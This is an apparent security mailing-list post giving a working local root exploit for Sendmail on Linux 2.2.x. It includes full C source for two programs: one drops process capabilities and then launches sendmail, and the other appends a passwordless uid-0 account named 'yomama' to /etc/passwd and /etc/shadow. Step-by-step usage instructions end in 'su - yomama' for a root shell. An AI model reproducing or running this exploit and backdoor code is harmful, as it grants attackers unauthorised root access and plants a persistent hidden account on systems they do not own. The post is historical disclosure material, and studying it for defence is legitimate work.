Sendmail local root exploit on linux 2.2.x

[sky () REAL-LINUX DE (Florian Heinz)]

Hello all,

Attached is a file with 2 sources, ex.c and add.c

compile these 2 and create a file "mail":

From: yomama () foobar com
To: localuser () localdomain com
Subject: foo
bar
.

then create a .forward with:
|/path/to/add

then just do: ./ex < mail

this should add a user yomama with uid/gid = 0 and without a password
set
a simple su - yomama should give you root.

This exploit was written by me in a hurry, I hope there are no mistakes

Greets

Florian Heinz



-- snip -- ex.c --

#include <linux/capability.h>

int main (void) {
   cap_user_header_t header;
   cap_user_data_t data;

   header = malloc(8);
   data = malloc(12);

   header->pid = 0;
   header->version = _LINUX_CAPABILITY_VERSION;

   data->inheritable = data->effective = data->permitted = 0;
   capset(header, data);

   execlp("/usr/sbin/sendmail", "sendmail", "-t", NULL);
}

-- snap -- ex.c --

-- snip -- add.c --

#include <fcntl.h>

int main (void) {
   int fd;
   char string[40];

   seteuid(0);
   fd = open("/etc/passwd", O_APPEND|O_WRONLY);
   strcpy(string, "yomama:x:0:0::/root:/bin/sh\n");
   write(fd, string, strlen(string));
   close(fd);
   fd = open("/etc/shadow", O_APPEND|O_WRONLY);
   strcpy(string, "yomama::11029:0:99999:7:::");
   write(fd, string, strlen(string));
   close(fd);

}

-- snap -- add.c --